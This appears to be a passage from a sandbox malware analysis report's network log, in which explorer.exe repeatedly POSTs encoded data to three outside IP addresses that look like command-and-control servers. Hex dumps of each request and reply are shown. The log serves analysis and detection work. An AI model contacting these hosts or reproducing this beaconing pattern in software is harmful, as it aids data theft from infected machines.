                                                          2024-07-19 11:45:40 UTC685INData Raw: 6f 33 73 31 6c 67 4e 30 54 6c 68 31 33 4d 71 67 33 4e 2f 4b 67 4d 6d 79 56 39 55 78 4c 43 6f 30 6b 51 4d 59 6d 74 7a 72 47 44 30 4f 4d 43 32 65 59 2f 79 62 31 36 45 57 39 6d 54 6b 39 51 72 47 7a 72 4d 38 6b 63 39 45 79 5a 73 4e 6a 32 78 30 4c 79 65 34 37 34 77 4d 65 30 65 64 31 45 6b 7a 62 4f 33 59 66 41 54 4d 56 35 36 6a 68 67 41 38 39 75 64 44 31 55 2f 33 50 34 52 61 2b 47 58 55 71 45 48 31 48 5a 5a 64 4b 6e 2f 57 35 74 6e 67 4a 43 31 68 30 33 46 36 76 62 47 61 42 75 77 66 66 76 62 4c 5a 75 6e 62 70 79 74 71 70 4c 67 35 4b 58 38 61 56 36 36 6c 7a 44 49 37 49 30 6a 4d 62 39 4a 74 76 50 55 75 61 2b 76 4d 75 45 61 6e 62 49 46 51 70 7a 6f 62 6a 54 71 6b 73 38 41 44 69 66 2f 79 56 37 79 38 70 50 6f 30 6f 58 74 41 43 55 71 57 38 5a 6b 77 4c 72 50 4e 69 62 6f
                                                          Data Ascii: o3s1lgN0Tlh13Mqg3N/KgMmyV9UxLCo0kQMYmtzrGD0OMC2eY/yb16EW9mTk9QrGzrM8kc9EyZsNj2x0Lye474wMe0ed1EkzbO3YfATMV56jhgA89udD1U/3P4Ra+GXUqEH1HZZdKn/W5tngJC1h03F6vbGaBuwffvbLZunbpytqpLg5KX8aV66lzDI7I0jMb9JtvPUua+vMuEanbIFQpzobjTqks8ADif/yV7y8pPo0oXtACUqW8ZkwLrPNibo


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.557839107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:41 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:41 UTC1122OUTData Raw: 72 46 4c 41 56 65 42 6f 42 44 77 49 63 2b 36 46 7a 37 6e 62 35 6b 6b 58 46 56 77 2b 6e 64 4e 79 77 56 79 37 5a 59 59 57 39 62 73 50 4e 31 48 37 46 75 64 37 4a 6a 66 74 51 63 72 77 4d 6b 68 4c 79 6f 44 77 57 4f 66 73 57 66 55 49 66 75 6e 58 4a 64 37 32 74 73 4e 70 54 51 47 4f 78 45 48 45 43 31 51 57 51 38 78 46 47 65 55 69 39 36 2f 38 69 43 30 70 68 41 75 69 52 2b 52 5a 4b 74 6d 6a 37 59 34 4f 53 6b 76 6f 37 43 6a 63 35 2f 78 31 56 57 78 42 6d 32 6e 52 79 65 33 37 77 75 38 46 56 42 73 64 6a 70 32 61 2b 37 74 47 4f 58 72 78 6f 6b 32 48 4a 71 49 66 68 46 46 72 49 68 72 44 6d 56 51 47 6b 37 67 48 4b 48 4b 4b 4c 57 5a 35 2b 64 58 6f 6c 48 4a 58 6a 31 70 46 43 76 51 34 68 35 38 50 71 69 49 78 59 2f 46 56 6a 31 7a 71 46 51 36 54 37 6d 41 4b 77 72 45 45 61 56 6c
                                                          Data Ascii: rFLAVeBoBDwIc+6Fz7nb5kkXFVw+ndNywVy7ZYYW9bsPN1H7Fud7JjftQcrwMkhLyoDwWOfsWfUIfunXJd72tsNpTQGOxEHEC1QWQ8xFGeUi96/8iC0phAuiR+RZKtmj7Y4OSkvo7Cjc5/x1VWxBm2nRye37wu8FVBsdjp2a+7tGOXrxok2HJqIfhFFrIhrDmVQGk7gHKHKKLWZ5+dXolHJXj1pFCvQ4h58PqiIxY/FVj1zqFQ6T7mAKwrEEaVl
                                                          2024-07-19 11:45:43 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:42 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:43 UTC685INData Raw: 44 58 34 74 31 61 54 39 49 44 53 74 44 74 58 31 54 61 61 33 42 71 55 4d 73 36 6c 32 4a 72 2b 42 64 79 41 4e 35 35 74 6b 70 2b 2b 54 78 70 42 4e 58 35 5a 57 51 64 53 54 50 74 6b 49 77 35 4b 62 48 66 56 4d 78 58 53 4e 33 32 53 2f 6c 61 49 4a 55 44 44 63 52 41 47 64 48 4e 2f 33 54 69 54 6d 43 49 59 4b 49 79 2b 32 67 71 56 66 72 50 6d 47 62 6f 33 53 35 7a 68 70 55 68 36 64 69 55 35 72 78 69 44 78 7a 61 57 75 76 52 5a 69 48 48 57 4b 4d 39 43 59 59 74 59 54 4a 62 35 64 43 52 34 57 30 50 68 43 6d 47 31 77 6d 56 70 46 54 48 53 67 48 62 4c 6d 7a 74 6f 47 2f 72 73 50 4f 33 51 75 50 56 71 75 47 4b 43 2f 54 78 75 62 32 58 43 33 36 35 57 6f 75 4a 2f 63 67 67 48 33 75 6b 33 55 55 52 77 4a 34 63 55 4c 36 78 61 4c 4d 61 6e 66 48 73 62 47 7a 2f 43 56 30 38 4d 31 7a 33 2b
                                                          Data Ascii: DX4t1aT9IDStDtX1Taa3BqUMs6l2Jr+BdyAN55tkp++TxpBNX5ZWQdSTPtkIw5KbHfVMxXSN32S/laIJUDDcRAGdHN/3TiTmCIYKIy+2gqVfrPmGbo3S5zhpUh6diU5rxiDxzaWuvRZiHHWKM9CYYtYTJb5dCR4W0PhCmG1wmVpFTHSgHbLmztoG/rsPO3QuPVquGKC/Txub2XC365WouJ/cggH3uk3UURwJ4cUL6xaLManfHsbGz/CV08M1z3+


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.557840167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:43 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:43 UTC1122OUTData Raw: 64 52 53 70 4d 45 73 70 50 55 69 69 36 4b 36 6c 59 75 6d 77 59 51 58 30 6b 55 2b 67 74 74 50 36 51 6e 34 72 6f 4a 6f 41 7a 7a 7a 31 30 2f 71 4a 49 47 4e 56 32 47 41 77 73 56 71 50 61 6e 73 4c 46 6d 43 30 47 65 48 47 65 36 2b 56 62 59 56 37 4e 45 6b 43 46 53 42 71 73 75 47 47 75 6f 63 35 46 58 43 76 4e 6c 32 49 5a 35 6a 63 36 61 53 32 46 74 49 6d 78 4c 42 55 43 6f 7a 39 64 77 51 70 76 2f 33 78 58 50 52 75 61 4b 2f 47 74 57 31 69 70 45 71 39 62 53 41 56 73 66 30 65 76 73 58 46 46 43 43 4b 50 44 72 30 44 69 72 55 72 65 72 6f 49 5a 48 78 64 43 6e 4a 68 55 58 30 74 5a 4a 36 45 41 74 57 73 30 75 71 52 57 33 6e 71 6d 32 78 75 57 30 77 47 30 69 35 4f 36 39 48 35 69 64 55 6d 2b 6b 4c 67 41 51 56 4e 54 6a 49 47 53 45 4b 76 55 6a 57 48 34 38 61 5a 2f 51 38 34 51 72
                                                          Data Ascii: dRSpMEspPUii6K6lYumwYQX0kU+gttP6Qn4roJoAzzz10/qJIGNV2GAwsVqPansLFmC0GeHGe6+VbYV7NEkCFSBqsuGGuoc5FXCvNl2IZ5jc6aS2FtImxLBUCoz9dwQpv/3xXPRuaK/GtW1ipEq9bSAVsf0evsXFFCCKPDr0DirUreroIZHxdCnJhUX0tZJ6EAtWs0uqRW3nqm2xuW0wG0i5O69H5idUm+kLgAQVNTjIGSEKvUjWH48aZ/Q84Qr
                                                          2024-07-19 11:45:44 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:44 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:44 UTC685INData Raw: 51 58 4b 55 6e 62 50 30 55 6b 4f 5a 64 6a 55 74 52 4d 36 2f 53 71 52 34 42 54 70 54 6f 79 4b 43 48 46 51 46 77 55 45 49 4b 7a 4f 46 68 4e 69 72 63 67 4a 66 51 38 74 54 50 4b 68 4b 78 64 39 4f 50 4b 37 7a 52 4d 53 76 4e 6f 41 51 47 77 50 76 69 7a 48 70 6a 36 41 76 6a 76 6b 2b 31 66 46 6b 6f 79 71 31 71 52 49 34 68 73 46 6c 67 56 75 35 45 4c 55 71 44 65 37 6c 4b 38 48 55 33 4e 6e 59 2b 54 75 4d 77 5a 59 79 37 64 61 6b 6e 52 62 4f 2b 52 73 79 76 74 43 39 63 30 31 4c 32 4e 79 2b 4f 50 76 32 67 41 65 58 38 2b 4c 31 30 61 2f 74 56 32 59 6b 33 67 50 6d 44 49 37 30 63 35 48 66 57 51 47 69 71 52 59 78 55 55 54 77 5a 38 33 53 47 70 33 4d 33 66 46 4d 41 2f 49 59 63 33 2f 74 4b 32 74 64 4b 37 49 6c 33 68 59 32 62 52 71 75 71 67 4d 4e 71 64 79 55 50 6c 66 56 71 50 4c
                                                          Data Ascii: QXKUnbP0UkOZdjUtRM6/SqR4BTpToyKCHFQFwUEIKzOFhNircgJfQ8tTPKhKxd9OPK7zRMSvNoAQGwPvizHpj6Avjvk+1fFkoyq1qRI4hsFlgVu5ELUqDe7lK8HU3NnY+TuMwZYy7daknRbO+RsyvtC9c01L2Ny+OPv2gAeX8+L10a/tV2Yk3gPmDI70c5HfWQGiqRYxUUTwZ83SGp3M3fFMA/IYc3/tK2tdK7Il3hY2bRquqgMNqdyUPlfVqPL


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.557841107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:45 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:45 UTC1122OUTData Raw: 59 37 47 4e 4b 46 57 69 44 36 36 74 54 4a 66 2f 49 67 63 2f 31 31 79 57 4b 7a 78 6d 52 35 64 2f 33 4c 36 4c 4c 51 42 4b 54 62 34 61 30 56 71 65 67 59 38 68 59 63 7a 75 34 56 6b 4b 4b 42 4c 5a 32 33 72 69 33 4f 62 6e 54 56 51 77 4d 53 52 62 44 38 31 77 67 77 4e 58 31 52 44 7a 4d 6f 6f 6f 4c 42 36 50 69 65 37 6a 70 66 6e 72 78 31 53 57 46 6a 7a 35 65 54 6d 47 41 39 57 61 7a 30 39 4e 35 37 6f 56 58 65 36 49 39 75 4d 7a 6d 44 67 58 58 76 74 62 32 32 41 32 33 63 46 6c 6f 64 43 36 34 2f 59 76 47 75 56 2f 64 47 66 35 6d 6e 32 47 76 51 34 30 41 4a 57 50 75 72 52 77 63 64 66 49 67 73 7a 69 6d 75 59 30 73 68 6b 32 57 5a 6c 43 65 6b 76 6f 77 45 52 56 51 73 74 47 68 39 4b 7a 6f 45 64 66 67 32 61 67 31 42 55 6f 72 2f 6c 30 6d 50 35 6c 56 6a 4c 52 78 6d 62 39 70 72 6d
                                                          Data Ascii: Y7GNKFWiD66tTJf/Igc/11yWKzxmR5d/3L6LLQBKTb4a0VqegY8hYczu4VkKKBLZ23ri3ObnTVQwMSRbD81wgwNX1RDzMoooLB6Pie7jpfnrx1SWFjz5eTmGA9Waz09N57oVXe6I9uMzmDgXXvtb22A23cFlodC64/YvGuV/dGf5mn2GvQ40AJWPurRwcdfIgszimuY0shk2WZlCekvowERVQstGh9KzoEdfg2ag1BUor/l0mP5lVjLRxmb9prm
                                                          2024-07-19 11:45:47 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:47 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:47 UTC685INData Raw: 56 56 78 68 76 50 30 4f 69 2f 4a 45 6a 76 45 36 31 68 68 58 74 77 33 37 41 4e 59 32 4d 36 30 72 63 76 7a 34 66 39 2f 53 43 65 64 33 4c 34 39 6e 66 42 44 33 37 30 6d 6a 5a 31 4c 56 63 70 43 76 6d 68 58 42 6c 7a 63 64 35 44 30 7a 45 6b 51 45 55 35 43 6f 44 50 38 37 2f 36 34 58 57 57 75 52 43 56 53 65 42 37 72 67 6f 63 78 63 56 70 48 39 35 72 4b 68 6a 50 52 67 4c 72 34 63 4c 6f 39 46 6b 72 51 56 76 30 57 33 66 2b 77 51 46 47 74 44 61 41 2b 50 37 50 55 50 78 6e 6c 58 53 5a 6d 57 64 6a 59 71 79 4d 72 6f 74 6d 39 73 33 72 69 74 36 72 75 45 67 68 48 65 38 43 43 41 75 53 41 47 65 76 68 77 30 66 44 30 62 57 47 43 52 45 73 32 51 49 6d 7a 69 4c 54 76 30 67 58 37 73 66 5a 7a 4e 4c 38 6b 65 72 39 63 79 47 32 58 2f 32 62 33 62 51 4a 79 77 63 69 64 69 61 4c 50 56 57 50
                                                          Data Ascii: VVxhvP0Oi/JEjvE61hhXtw37ANY2M60rcvz4f9/SCed3L49nfBD370mjZ1LVcpCvmhXBlzcd5D0zEkQEU5CoDP87/64XWWuRCVSeB7rgocxcVpH95rKhjPRgLr4cLo9FkrQVv0W3f+wQFGtDaA+P7PUPxnlXSZmWdjYqyMrotm9s3rit6ruEghHe8CCAuSAGevhw0fD0bWGCREs2QImziLTv0gX7sfZzNL8ker9cyG2X/2b3bQJywcidiaLPVWP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.557843107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:47 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:45:47 UTC1267OUTData Raw: 69 34 77 36 49 77 35 7a 4e 52 43 62 4d 69 47 45 43 72 34 31 74 2b 44 7a 31 52 71 64 63 56 37 70 72 64 35 30 61 34 74 46 6b 4e 4e 38 6e 2b 69 4a 71 34 46 61 41 66 42 31 58 50 38 4b 4c 70 51 55 6c 66 36 30 52 61 6d 6b 73 71 4e 58 48 66 4a 52 4e 5a 5a 74 2b 64 71 73 39 50 69 6a 41 70 44 44 72 6f 57 79 48 69 44 7a 70 79 69 70 67 31 39 68 77 72 32 62 52 63 39 35 43 41 4d 74 76 70 58 4a 59 64 73 6f 48 66 47 30 34 61 44 6b 35 58 69 43 42 2b 76 39 79 6c 64 49 47 37 79 55 6c 64 47 2f 58 61 4f 79 54 65 35 71 71 68 5a 72 4c 62 58 6f 73 38 65 63 74 59 68 79 35 6e 50 76 33 52 43 6f 64 46 63 50 73 72 4e 74 6f 6b 38 79 41 33 31 67 32 5a 4e 52 4d 35 53 66 55 5a 77 58 48 47 39 66 75 4e 38 62 6c 50 4c 41 4c 2f 53 4b 46 39 46 47 37 6a 31 41 58 6d 59 64 79 44 76 72 2b 44 6d
                                                          Data Ascii: i4w6Iw5zNRCbMiGECr41t+Dz1RqdcV7prd50a4tFkNN8n+iJq4FaAfB1XP8KLpQUlf60RamksqNXHfJRNZZt+dqs9PijApDDroWyHiDzpyipg19hwr2bRc95CAMtvpXJYdsoHfG04aDk5XiCB+v9yldIG7yUldG/XaOyTe5qqhZrLbXos8ectYhy5nPv3RCodFcPsrNtok8yA31g2ZNRM5SfUZwXHG9fuN8blPLAL/SKF9FG7j1AXmYdyDvr+Dm
                                                          2024-07-19 11:45:49 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:49 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:49 UTC685INData Raw: 30 51 65 30 72 47 68 71 6f 4e 6f 72 43 79 51 72 6e 79 35 74 6a 46 39 64 5a 54 79 7a 75 58 75 58 45 33 62 68 42 61 34 6b 62 71 6e 59 58 67 69 55 2b 38 66 76 72 39 62 54 38 41 78 45 76 6e 34 58 79 75 74 56 74 75 4b 30 6e 61 4e 67 51 41 48 45 71 76 44 55 62 6d 46 74 71 52 51 32 64 69 47 47 66 63 34 50 45 71 35 47 6a 52 67 52 63 73 59 79 5a 76 79 69 50 76 41 6b 58 30 7a 68 5a 54 75 6a 6a 33 71 43 48 42 52 4d 72 36 43 76 44 6f 55 34 6b 44 48 31 76 45 65 79 42 30 48 37 6e 6f 78 34 65 45 42 31 73 43 35 68 63 34 54 34 4e 64 2f 75 6e 63 6c 70 32 53 4c 76 72 47 35 67 47 77 77 49 65 42 30 74 38 2f 68 55 37 67 4f 6a 57 43 55 37 6d 76 4f 41 70 4c 46 2b 62 77 68 2f 4b 5a 65 43 4b 31 33 76 6c 44 75 50 7a 75 50 46 5a 69 46 57 74 65 32 4b 75 66 6c 34 62 54 69 59 51 76 4a
                                                          Data Ascii: 0Qe0rGhqoNorCyQrny5tjF9dZTyzuXuXE3bhBa4kbqnYXgiU+8fvr9bT8AxEvn4XyutVtuK0naNgQAHEqvDUbmFtqRQ2diGGfc4PEq5GjRgRcsYyZvyiPvAkX0zhZTujj3qCHBRMr6CvDoU4kDH1vEeyB0H7nox4eEB1sC5hc4T4Nd/unclp2SLvrG5gGwwIeB0t8/hU7gOjWCU7mvOApLF+bwh/KZeCK13vlDuPzuPFZiFWte2Kufl4bTiYQvJ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.557844167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:49 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:49 UTC1122OUTData Raw: 58 4d 69 61 44 57 35 32 44 6e 6f 75 68 65 58 54 66 52 57 42 49 47 63 4b 36 31 46 50 38 77 6f 54 2f 61 52 47 39 77 44 43 37 35 4b 6d 48 37 53 4c 59 4b 41 63 5a 4a 47 4e 70 4e 6f 62 39 62 4c 47 64 63 39 44 69 2f 4f 78 48 49 51 34 55 53 76 72 68 46 52 34 41 6e 37 6c 42 49 4c 73 73 61 6d 4a 64 51 6d 4f 31 77 6e 5a 33 50 50 69 35 75 74 4c 6a 56 46 68 59 59 41 66 62 79 67 70 31 38 68 59 31 69 62 32 37 61 78 76 44 79 31 4c 6e 2b 38 4e 65 2f 71 73 35 35 46 77 52 50 36 5a 70 53 57 4b 53 67 77 67 4b 59 53 31 66 6f 73 58 6c 59 30 74 75 69 55 42 62 6f 37 79 2b 6a 74 53 2b 49 76 4c 75 56 4f 58 6f 74 50 71 74 54 30 2b 35 6e 6b 71 37 6b 35 2f 35 54 45 61 2f 4b 79 34 78 58 4a 39 74 54 7a 33 4d 37 6c 54 73 44 78 43 4e 75 37 73 6c 52 6e 6e 42 56 76 7a 42 6a 63 6b 47 61 54
                                                          Data Ascii: XMiaDW52DnouheXTfRWBIGcK61FP8woT/aRG9wDC75KmH7SLYKAcZJGNpNob9bLGdc9Di/OxHIQ4USvrhFR4An7lBILssamJdQmO1wnZ3PPi5utLjVFhYYAfbygp18hY1ib27axvDy1Ln+8Ne/qs55FwRP6ZpSWKSgwgKYS1fosXlY0tuiUBbo7y+jtS+IvLuVOXotPqtT0+5nkq7k5/5TEa/Ky4xXJ9tTz3M7lTsDxCNu7slRnnBVvzBjckGaT
                                                          2024-07-19 11:45:50 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:50 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:50 UTC685INData Raw: 54 47 70 48 6d 50 35 56 57 47 48 6e 6a 52 57 6b 67 6a 2f 6e 52 53 57 33 35 50 51 31 42 61 54 73 78 65 32 44 72 73 4d 77 35 57 66 73 58 52 51 67 4a 67 42 53 53 55 53 4a 6f 76 77 5a 75 75 57 37 69 6d 77 66 73 54 75 49 76 51 59 5a 58 51 37 59 64 56 4b 76 31 6d 54 6c 4e 39 62 36 34 79 2f 49 46 70 6a 6f 64 6e 34 50 34 6e 47 34 74 6a 49 35 63 79 33 55 66 46 7a 70 74 2b 57 67 4d 48 6a 69 68 68 51 35 61 46 62 75 79 50 54 54 46 6e 7a 6f 6f 67 4a 6d 71 6c 33 61 31 4b 33 35 76 78 55 30 35 67 57 43 5a 4c 6a 6f 4e 39 31 76 63 41 4d 57 74 38 74 4b 71 4b 78 36 32 39 56 48 41 2f 4f 79 7a 61 4e 50 63 47 37 33 57 4b 6f 36 58 53 51 33 76 68 4d 33 4c 77 56 58 69 6e 6d 46 75 37 77 6e 41 64 4f 77 72 77 41 39 32 73 4b 76 5a 72 41 70 48 77 50 54 30 58 4e 78 38 6c 77 47 43 72 43
                                                          Data Ascii: TGpHmP5VWGHnjRWkgj/nRSW35PQ1BaTsxe2DrsMw5WfsXRQgJgBSSUSJovwZuuW7imwfsTuIvQYZXQ7YdVKv1mTlN9b64y/IFpjodn4P4nG4tjI5cy3UfFzpt+WgMHjihhQ5aFbuyPTTFnzoogJmql3a1K35vxU05gWCZLjoN91vcAMWt8tKqKx629VHA/OyzaNPcG73WKo6XSQ3vhM3LwVXinmFu7wnAdOwrwA92sKvZrApHwPT0XNx8lwGCrC


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.557845107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:51 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:51 UTC1122OUTData Raw: 4d 5a 32 7a 4e 38 6a 66 37 78 78 37 7a 50 6f 76 58 39 71 64 35 51 4e 43 67 35 6a 33 34 54 59 4a 4c 4a 61 4d 34 75 57 64 42 4c 78 61 44 53 6c 78 32 39 38 62 47 77 41 75 4c 38 6c 7a 69 66 71 2b 55 2f 41 68 76 56 4b 62 57 6a 33 65 41 41 46 42 56 39 70 73 52 56 68 71 30 4a 50 75 65 52 52 73 38 50 37 79 47 73 45 52 4c 48 65 47 77 63 35 45 71 46 61 6f 49 58 6a 39 61 73 4c 46 4f 54 4f 72 6f 6b 31 34 69 41 36 65 41 43 30 57 73 57 51 61 6b 4d 34 74 49 45 6e 6f 76 70 31 30 61 79 56 76 34 36 4f 73 34 74 37 49 33 32 43 39 61 68 30 68 62 6d 66 59 66 65 51 71 4a 31 6a 4c 41 36 64 4c 72 6c 79 35 53 59 52 64 2b 75 30 4a 37 5a 74 68 54 52 41 6d 35 2b 4f 54 72 55 52 4a 55 72 4d 36 2f 5a 55 68 34 4b 69 30 5a 36 6f 48 69 4c 41 42 2b 36 48 45 7a 39 34 77 53 76 63 57 4b 70 4f
                                                          Data Ascii: MZ2zN8jf7xx7zPovX9qd5QNCg5j34TYJLJaM4uWdBLxaDSlx298bGwAuL8lzifq+U/AhvVKbWj3eAAFBV9psRVhq0JPueRRs8P7yGsERLHeGwc5EqFaoIXj9asLFOTOrok14iA6eAC0WsWQakM4tIEnovp10ayVv46Os4t7I32C9ah0hbmfYfeQqJ1jLA6dLrly5SYRd+u0J7ZthTRAm5+OTrURJUrM6/ZUh4Ki0Z6oHiLAB+6HEz94wSvcWKpO
                                                          2024-07-19 11:45:53 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:53 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:53 UTC685INData Raw: 52 75 6c 69 7a 6d 56 52 74 2b 2b 32 53 34 74 4d 54 34 53 62 44 5a 73 5a 5a 49 57 2b 4a 73 6e 46 52 37 71 6c 56 35 4e 38 35 63 75 4f 43 72 5a 52 47 59 45 5a 34 31 48 76 71 7a 77 35 42 44 43 57 46 79 4a 68 30 57 64 6b 75 6e 63 37 46 2f 6a 42 45 35 7a 39 53 54 76 4e 49 49 6e 67 71 63 31 55 6c 4a 34 32 4a 76 73 57 7a 49 79 44 4e 62 75 78 71 47 57 45 37 2f 64 30 67 4e 51 34 38 54 38 77 64 43 78 52 36 5a 31 70 4e 6c 36 56 65 77 35 58 79 2f 42 51 74 30 38 6e 53 76 32 47 36 65 5a 61 51 6e 44 73 49 47 68 67 73 78 79 50 56 55 42 6e 42 52 4a 45 75 44 39 42 50 34 6d 43 4f 54 52 62 42 6a 65 61 4a 76 42 4e 5a 6b 39 73 73 6b 41 2b 75 30 65 43 30 63 74 4c 44 2f 34 70 6c 53 62 30 7a 67 38 49 52 2b 6f 49 70 6e 50 47 31 51 72 4e 32 6b 45 6d 6e 63 61 6e 70 74 54 4d 4f 4b 59
                                                          Data Ascii: RulizmVRt++2S4tMT4SbDZsZZIW+JsnFR7qlV5N85cuOCrZRGYEZ41Hvqzw5BDCWFyJh0Wdkunc7F/jBE5z9STvNIIngqc1UlJ42JvsWzIyDNbuxqGWE7/d0gNQ48T8wdCxR6Z1pNl6Vew5Xy/BQt08nSv2G6eZaQnDsIGhgsxyPVUBnBRJEuD9BP4mCOTRbBjeaJvBNZk9sskA+u0eC0ctLD/4plSb0zg8IR+oIpnPG1QrN2kEmncanptTMOKY


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.557847107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:53 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:45:53 UTC1267OUTData Raw: 44 49 6e 56 31 41 47 30 58 61 44 57 55 76 6f 39 5a 6c 70 68 61 6f 7a 2f 68 79 72 6e 38 46 68 36 52 63 39 47 55 4d 35 76 72 57 31 78 78 38 36 79 37 76 2f 69 68 2f 4b 41 39 68 69 6b 2f 68 42 4c 37 52 34 46 43 46 37 34 4c 30 68 67 62 53 78 61 37 2b 4a 5a 39 2b 68 4f 55 31 43 39 4e 41 32 46 33 41 31 35 4d 37 47 76 36 44 4e 4a 74 55 38 4d 4d 41 52 69 54 74 37 6a 57 38 6f 7a 65 30 66 64 39 2b 38 44 5a 73 7a 38 72 74 62 43 70 54 6b 66 43 64 68 4a 44 33 4f 74 36 6a 62 36 33 61 44 69 44 69 4e 2b 39 41 6f 75 43 43 43 46 7a 51 36 73 57 75 67 67 6f 4e 45 4f 63 70 6f 57 50 66 48 75 4c 4f 58 58 36 5a 4c 75 72 6f 2f 65 65 6f 43 4c 73 2f 72 47 75 63 58 4c 4f 6f 45 4f 64 6c 34 76 41 4a 39 55 72 6b 70 4f 6c 42 38 5a 73 6b 37 33 6f 67 58 41 2f 62 49 57 43 47 38 72 61 6a 6e
                                                          Data Ascii: DInV1AG0XaDWUvo9Zlphaoz/hyrn8Fh6Rc9GUM5vrW1xx86y7v/ih/KA9hik/hBL7R4FCF74L0hgbSxa7+JZ9+hOU1C9NA2F3A15M7Gv6DNJtU8MMARiTt7jW8oze0fd9+8DZsz8rtbCpTkfCdhJD3Ot6jb63aDiDiN+9AouCCCFzQ6sWuggoNEOcpoWPfHuLOXX6ZLuro/eeoCLs/rGucXLOoEOdl4vAJ9UrkpOlB8Zsk73ogXA/bIWCG8rajn
                                                          2024-07-19 11:45:55 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:55 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
